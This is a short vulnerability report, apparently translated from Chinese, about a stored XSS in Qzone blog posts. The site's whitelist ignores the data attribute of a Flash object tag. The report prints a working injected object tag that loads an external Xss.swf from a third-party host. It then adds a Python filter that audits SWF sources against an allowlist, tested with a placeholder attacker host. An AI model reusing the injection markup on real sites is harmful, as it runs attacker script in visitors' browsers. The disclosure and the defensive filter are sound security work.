A defect in one QQ空间 (Qzone) feature leads to stored XSS in blog posts (日志).
There is no brilliant analysis from 二哥 here, and no clever bypass technique either, just an XSS.
Create a new blog post and insert a song.
The Flash object generated for the song is whitelisted.
For example:
```html
<object allowscriptaccess= "always"
bgcolor= "#ffffff"
class = "blog_music"
classid= "clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase= "http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab,0,0,0"
height= "100"
id= "musicFlash0"
menu= "true"
name= "musicFlash**"
ubb= "729312|3|http://stream9.qqmusic.qq.com/12729312.wma|Postcard from Paris|6458|The Band Perry|0"
width= "410" ><param name= "movie"
value= "http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" /><param name= "data"
value= "http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" /><param name= "bgColor"
value= "#ffffff" /><param name= "wmode"
value= "transparent" /><param name= "menu"
value= "true" /><param name= "allowScriptAccess"
value= "always" /></object>
```
But the Flash address actually loaded is governed by the `data` attribute of the `object` element, which the whitelist does not cover.
And so:
```html
<object allowscriptaccess= "always"
bgcolor= "#ffffff"
class = "blog_music"
classid= "clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase= "http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab,0,0,0"
data= "http://xsst.sinaapp.com/Xss.swf"
height= "100"
id= "musicFlash0"
menu= "true"
name= "musicFlash**"
ubb= "729312|3|http://stream9.qqmusic.qq.com/12729312.wma|Postcard from Paris|6458|The Band Perry|0"
width= "410" ><param name= "movie"
value= "http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" /><param name= "data"
value= "http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" /><param name= "bgColor"
value= "#ffffff" /><param name= "wmode"
value= "transparent" /><param name= "menu"
value= "true" /><param name= "allowScriptAccess"
value= "always" /></object>
```
Borrowing 二哥's http://xsst.sinaapp.com/Xss.swf as the `data` value.
Submit the post and it takes effect. (This XSS only affects the IE browser.)
Fix:
Filter it: every attribute and `param` inside the `object` that can name the SWF to load must be checked against the whitelist, not just the `movie` param the editor generates.
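As an added example of the filtering the fix calls for (written for this page, not Qzone's own code), the following Python audits a blog-post `object` fragment and reports every SWF source that is off the allowlist. It treats the `data` attribute of `object` and the `movie`, `data` and `src` params as equivalent sources, which is exactly the gap the report describes: constraining only the generated `movie` param leaves the `data` attribute, which IE honours, unchecked. The allowlist, the attacker host and the sample fragment are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed allowlist for this example (an assumption, not Qzone's real policy):
# the only SWF a blog-post music embed may load is the site's own player.
ALLOWED_SWF = {"http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf"}

# Every place inside <object> that can name the SWF to run. Checking only
# <param name="movie"> is the defect on the page: the `data` attribute on
# <object> itself overrides it in IE, so it must be on the same allowlist.
OBJECT_URL_ATTRS = ("data",)
PARAM_URL_NAMES = ("movie", "data", "src")


def normalize(url: str) -> str:
    """Canonical scheme://host/path so case or whitespace does not slip past an exact-match allowlist."""
    p = urlsplit(url.strip())
    return f"{p.scheme.lower()}://{p.netloc.lower()}{p.path}"


ALLOWED_NORM = {normalize(u) for u in ALLOWED_SWF}


class ObjectAuditor(HTMLParser):
    """Collect every URL an <object> block could load its SWF from."""

    def __init__(self):
        super().__init__()
        self.sources = []   # list of (location, url)
        self.depth = 0      # > 0 while inside an <object>

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            self.depth += 1
            for k in OBJECT_URL_ATTRS:
                if k in a:
                    self.sources.append((f"object@{k}", a[k]))
        elif tag == "param" and self.depth > 0:
            name = a.get("name", "").lower()
            if name in PARAM_URL_NAMES:
                self.sources.append((f"param:{name}", a.get("value", "")))

    def handle_endtag(self, tag):
        if tag == "object" and self.depth > 0:
            self.depth -= 1


def audit_embed(fragment: str) -> list:
    """Return every (location, url) in the fragment whose SWF source is not on the allowlist."""
    auditor = ObjectAuditor()
    auditor.feed(fragment)
    auditor.close()
    return [(where, url) for where, url in auditor.sources
            if normalize(url) not in ALLOWED_NORM]


def is_safe_embed(fragment: str) -> bool:
    """True only when every SWF source the object names is allowlisted; reject the post otherwise."""
    return not audit_embed(fragment)


# Constructed sample input: the generated embed with an attacker-controlled
# `data` attribute added (placeholder host, mixed case to exercise normalize()).
INJECTED = '''<object allowscriptaccess="always" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
 data="HTTP://Attacker.Example/Xss.swf" width="410" height="100">
<param name="movie" value="http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" />
<param name="data" value="http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf" />
<param name="allowScriptAccess" value="always" /></object>'''

# The same embed with the injected attribute removed, i.e. what the editor generates.
CLEAN = INJECTED.replace(' data="HTTP://Attacker.Example/Xss.swf"', "")

if __name__ == "__main__":
    print(audit_embed(INJECTED))   # [('object@data', 'HTTP://Attacker.Example/Xss.swf')]
    print(is_safe_embed(CLEAN))    # True
```

On the server, run `is_safe_embed` over every `object` fragment in a submitted post and reject (or strip the element from) anything that fails; rewriting the user's markup into a fixed template with only the song id substituted is the stronger option, since then no user-supplied attribute reaches the page at all.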